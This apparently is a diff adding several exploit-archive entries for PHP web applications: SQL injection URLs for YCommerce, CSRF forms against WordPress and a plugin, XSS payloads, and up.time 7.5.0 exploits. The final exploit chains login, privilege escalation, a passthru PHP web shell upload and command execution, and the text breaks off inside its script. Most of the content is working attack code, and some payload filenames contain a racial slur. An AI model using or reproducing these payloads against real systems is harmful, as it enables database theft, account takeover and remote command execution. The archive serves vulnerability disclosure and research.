@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/55653/info
YCommerce is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Proof of Concept - YCommerce Reseller
-------------------------------------
GET Param "cPath" - [Number of columns may vary]
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
/store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--
Proof of Concept - YCommerce Pro
--------------------------------
GET Param "enterprise_id" - [Number of columns may vary]
/store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61
GET Param "news_id" - [Number of columns may vary]
/store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61--

9
platforms/php/webapps/37835.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55660/info
WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
WordPress 3.4.2 is vulnerable; other versions may also be affected.
<body onload="javascript:document.forms[0].submit()"> <form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form"> <h1>How Many Girls You Have? xD))</h1> <!-- Idea for you: Iframe it --> <input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php" /> <select id="rss-items-1" name="widget-rss[1][items]"> <option value='1' >1</option> <option value='2' >2</option> <option value='3' >3</option><option value='4' >4</option> <option value='5' >5</option> <option value='6' >6</option> <option value='7' >7</option> <option value='8' >8</option> <option value='9' >9</option> <option value='10' >10</option> <option value='11' >11</option> <option value='12' >12</option> <option value='13' >13</option> <option value='14' >14</option> <option value='15' >15</option> <option value='16' >16</option> <option value='17' >17</option> <option value='18' >18</option> <option value='19' >19</option> <option value='20' selected='selected'>20</option> </select> <input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/> <input type="hidden" name="widget_id" value="dashboard_incoming_links" /> </form>

10
platforms/php/webapps/37836.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/55664/info
The Token Manager plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Token Manager 1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin.php?page=tokenmanageredit&tid=<script>alert(document.cookie);</script>
http://www.example.com/wp-admin/admin.php?page=tokenmanagertypeedit&tid=<script>alert(document.cookie);</script>

35
platforms/php/webapps/37837.html Executable file
View file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/55666/info
The Sexy Add Template plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
Sexy Add Template 1.0 is vulnerable; other versions may also be affected.
#################################################################################
#
# [ Information Details ]
# - Wordpress Plugin Sexy Add Template:
# Attacker allow CSRF Upload Shell.
# http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
#
# <html>
# <head>
# <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
# <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
# </head>
# <body onload="document.form0.submit();">
# <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
# <input type="hidden" name="newfile" value="yes" />
# <input type="hidden" type="text" value="shell.php" name="AM_filename">
# <textarea type="hidden" name="AM_file_content">
# [ Your Script Backdoor/Shell ]
# &lt;/textarea&gt;
# </form>
# </body>
# </html>
#
# - Access Shell:
# http://www.example.com/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!!
#
# +#################################################################################

7
platforms/php/webapps/37838.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55667/info
Neturf eCommerce Shopping Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>

72
platforms/php/webapps/37885.html Executable file
View file

@ -0,0 +1,72 @@
<!--
up.time 7.5.0 Superadmin Privilege Escalation Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: up.time suffers from a privilege escalation issue.
Normal user can elevate his/her privileges by sending
a POST request seting the parameter 'userroleid' to 1.
Attacker can exploit this issue using also cross-site
request forgery attacks.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5251
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php
29.07.2015
--
-->
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=4" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus2" />
<input type="hidden" name="password" value="&#42;&#42;&#42;&#42;&#42;" />
<input type="hidden" name="passwordConfirm" value="&#42;&#42;&#42;&#42;&#42;" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test2&#64;test&#46;test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="1" />
<input type="hidden" name="usergroupid&#91;&#93;" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

113
platforms/php/webapps/37886.txt Executable file
View file

@ -0,0 +1,113 @@

up.time 7.5.0 XSS And CSRF Add Admin Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered.
The issue is triggered when input passed via the multiple
parameters is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of
an affected site.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5252
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php
29.07.2015
--
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=add&id=0" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus4" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="passwordConfirm" value="123123" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test4&#64;test&#46;test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="2" />
<input type="hidden" name="usergroupid&#91;&#93;" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reflected XSS:
--------------
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac%22%3E%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29;%3E&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1a416c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea233bd169b0 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=14f2e6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cfd43d432&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac"><img%20src%3da%20onload%3dalert(1)>f2c23&name=Testingus4 HTTP/1.1
-
GET /main.php?page=Users&subPage=UserContainer&subsection=view&id=240689'%3balert(1)%2f%2f205 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=6&name=Testingus4e8b7f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadfb7 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit7bef8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9095&id=6&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add270d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c1acb1f950&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28a3345"><img%20src%3da%20onload%3dalert(1)>2d6845d9556&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3a00%3a006795f"><img%20src%3da%20onload%3dalert(1)>c92fbc98475&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28c0570"><img%20src%3da%20onload%3dalert(1)>77b8cd697e9&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3a59%3a592b983"><img%20src%3da%20onload%3dalert(1)>0d9cc3967ae&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6"><img%20src%3da%20onload%3dalert(1)>84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1

35
platforms/php/webapps/37887.txt Executable file
View file

@ -0,0 +1,35 @@

up.time 7.5.0 Arbitrary File Disclose And Delete Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: Input passed to the 'file_name' parameter in 'get2post.php'
script is not properly sanitised before being used to get
the contents of a resource and delete files. This can be
exploited to read and delete arbitrary data from local
resources with the permissions of the web server using a
proxy tool.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5253
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5253.php
29.07.2015
--
http://127.0.0.1:9999/wizards/get2post.php?file_name=C:\\test.txt

243
platforms/php/webapps/37888.txt Executable file
View file

@ -0,0 +1,243 @@

up.time 7.5.0 Upload And Execute File Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: up.time suffers from arbitrary command execution.
Attackers can exploit this issue using the monitor service
feature and adding a command with respected arguments to given
binary for execution. In combination with the CSRF, Privilege
Escalation, Arbitrary text file creation and renaming that
file to php for example in arbitrary location and executing
system commands with SYSTEM privileges.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Ewerson 'Crash' Guimaraes
@zeroscience
Advisory ID: ZSL-2015-5254
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php
29.07.2015
--
<html>
<head>
<title>Uptime Exploit</title>
</head>
<body onload="runme();">
<!-- Login -->
<form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0">
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
</form>
<!-- Escalate privileges -->
<form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="passwordConfirm" value="123456" />
<input type="hidden" name="firstname" value="Sample" />
<input type="hidden" name="lastname" value="User" />
<input type="hidden" name="location" value="" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="" />
<input type="hidden" name="windowsworkgroup" value="" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="0" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="1" />
<input type="hidden" name="usergroupid&#91;&#93;" value="1" />
</form>
<!-- Log-off to refresh permission -->
<form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2">
<input type="hidden" name="logout" value="1" />
</form>
<!-- Login with escalated user -->
<form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3">
<input type="hidden" name="username" value="sample" />
<input type="hidden" name="password" value="123456" />
</form>
<!-- Creating Monitor to rename php shell -->
<form name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4">
<input type="hidden" name="initialERDCId" value="20" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="targetType" value="systemList" />
<input type="hidden" name="systemList" value="1" />
<input type="hidden" name="serviceGroupList" value="&#45;10" />
<input type="hidden" name="initialMode" value="standard" />
<input type="hidden" name="erdcName" value="Exploit" />
<input type="hidden" name="erdcInitialName" value="" />
<input type="hidden" name="erdcDescription" value="Exploit" />
<input type="hidden" name="hostButton" value="system" />
<input type="hidden" name="erdc&#95;id" value="20" />
<input type="hidden" name="forceReload" value="0" />
<input type="hidden" name="operation" value="standard" />
<input type="hidden" name="erdc&#95;instance&#95;id" value="" />
<input type="hidden" name="label&#95;&#91;184&#93;" value="Script&#32;Name" />
<input type="hidden" name="value&#95;&#91;184&#93;" value="c&#58;&#92;windows&#92;system32&#92;cmd&#46;exe" />
<input type="hidden" name="id&#95;&#91;184&#93;" value="process" />
<input type="hidden" name="name&#95;&#91;process&#93;" value="184" />
<input type="hidden" name="units&#95;&#91;184&#93;" value="" />
<input type="hidden" name="guiBasic&#95;&#91;184&#93;" value="1" />
<input type="hidden" name="inputType&#95;&#91;184&#93;" value="GUIString" />
<input type="hidden" name="screenOrder&#95;&#91;184&#93;" value="1" />
<input type="hidden" name="parmType&#95;&#91;184&#93;" value="1" />
<input type="hidden" name="label&#95;&#91;185&#93;" value="Arguments" />
<input type="hidden" name="value&#95;&#91;185&#93;" value="&#32;&#47;C&#32;ren&#32;"C&#58;&#92;Program&#32;Files&#92;uptime&#32;software&#92;uptime&#92;GUI&#92;wizards&#92;nigga&#46;txt"&#32;"nigga&#46;php"&#32;" />
<input type="hidden" name="id&#95;&#91;185&#93;" value="args" />
<input type="hidden" name="name&#95;&#91;args&#93;" value="185" />
<input type="hidden" name="units&#95;&#91;185&#93;" value="" />
<input type="hidden" name="guiBasic&#95;&#91;185&#93;" value="1" />
<input type="hidden" name="inputType&#95;&#91;185&#93;" value="GUIString" />
<input type="hidden" name="screenOrder&#95;&#91;185&#93;" value="2" />
<input type="hidden" name="parmType&#95;&#91;185&#93;" value="1" />
<input type="hidden" name="label&#95;&#91;187&#93;" value="Output" />
<input type="hidden" name="can&#95;retain&#95;&#91;187&#93;" value="false" />
<input type="hidden" name="comparisonWarn&#95;&#91;187&#93;" value="&#45;1" />
<input type="hidden" name="comparison&#95;&#91;187&#93;" value="&#45;1" />
<input type="hidden" name="id&#95;&#91;187&#93;" value="value&#95;critical&#95;output" />
<input type="hidden" name="name&#95;&#91;output&#93;" value="187" />
<input type="hidden" name="units&#95;&#91;187&#93;" value="" />
<input type="hidden" name="guiBasic&#95;&#91;187&#93;" value="1" />
<input type="hidden" name="inputType&#95;&#91;187&#93;" value="GUIString" />
<input type="hidden" name="screenOrder&#95;&#91;187&#93;" value="4" />
<input type="hidden" name="parmType&#95;&#91;187&#93;" value="2" />
<input type="hidden" name="label&#95;&#91;189&#93;" value="Response&#32;time" />
<input type="hidden" name="can&#95;retain&#95;&#91;189&#93;" value="false" />
<input type="hidden" name="comparisonWarn&#95;&#91;189&#93;" value="&#45;1" />
<input type="hidden" name="comparison&#95;&#91;189&#93;" value="&#45;1" />
<input type="hidden" name="id&#95;&#91;189&#93;" value="value&#95;critical&#95;timer" />
<input type="hidden" name="name&#95;&#91;timer&#93;" value="189" />
<input type="hidden" name="units&#95;&#91;189&#93;" value="ms" />
<input type="hidden" name="guiBasic&#95;&#91;189&#93;" value="0" />
<input type="hidden" name="inputType&#95;&#91;189&#93;" value="GUIInteger" />
<input type="hidden" name="screenOrder&#95;&#91;189&#93;" value="6" />
<input type="hidden" name="parmType&#95;&#91;189&#93;" value="2" />
<input type="hidden" name="timing&#95;&#91;erdc&#95;instance&#95;monitored&#93;" value="1" />
<input type="hidden" name="timing&#95;&#91;timeout&#93;" value="60" />
<input type="hidden" name="timing&#95;&#91;check&#95;interval&#93;" value="10" />
<input type="hidden" name="timing&#95;&#91;recheck&#95;interval&#93;" value="1" />
<input type="hidden" name="timing&#95;&#91;max&#95;rechecks&#93;" value="3" />
<input type="hidden" name="alerting&#95;&#91;notification&#93;" value="1" />
<input type="hidden" name="alerting&#95;&#91;alert&#95;interval&#93;" value="120" />
<input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;critical&#93;" value="1" />
<input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;warning&#93;" value="1" />
<input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;recovery&#93;" value="1" />
<input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;unknown&#93;" value="1" />
<input type="hidden" name="time&#95;period&#95;id" value="1" />
<input type="hidden" name="pageFinish" value="Finish" />
<input type="hidden" name="pageContinue" value="Continue&#46;&#46;&#46;" />
<input type="hidden" name="isWizard" value="1" />
<input type="hidden" name="wizardPage" value="2" />
<input type="hidden" name="wizardNumPages" value="2" />
<input type="hidden" name="wizardTask" value="pageFinish" />
<input type="hidden" name="visitedPage&#91;1&#93;" value="1" />
<input type="hidden" name="visitedPage&#91;2&#93;" value="1" />
</form>
<!-- Uploading php shell txt format -->
<form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5">
<input type="hidden" name="file&#95;name" value="nigga&#46;txt" />
<input type="hidden" name="script" value="<&#63;&#32;passthru&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#59;&#32;&#63;>" />
</form>
<!-- Run command to rename php shell -->
<form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6">
<input type="hidden" name="section" value="RunERDCInstance" />
<input type="hidden" name="subsection" value="view" />
<input type="hidden" name="id" value="65535" />
<input type="hidden" name="name" value="Exploit" />
</form>
<!-- Executing basic command -->
<form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7">
<input type="hidden" name="cmd" value="whoami" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<iframe name="frame3"></iframe>
<iframe name="frame4"></iframe>
<iframe name="frame5"></iframe>
<iframe name="frame6"></iframe>
<iframe name="frame7"></iframe>
<script>
function runme()
{
document.login.submit();
document.getElementsByTagName("iframe")[0].onload = function()
//document.write("Login....")
{
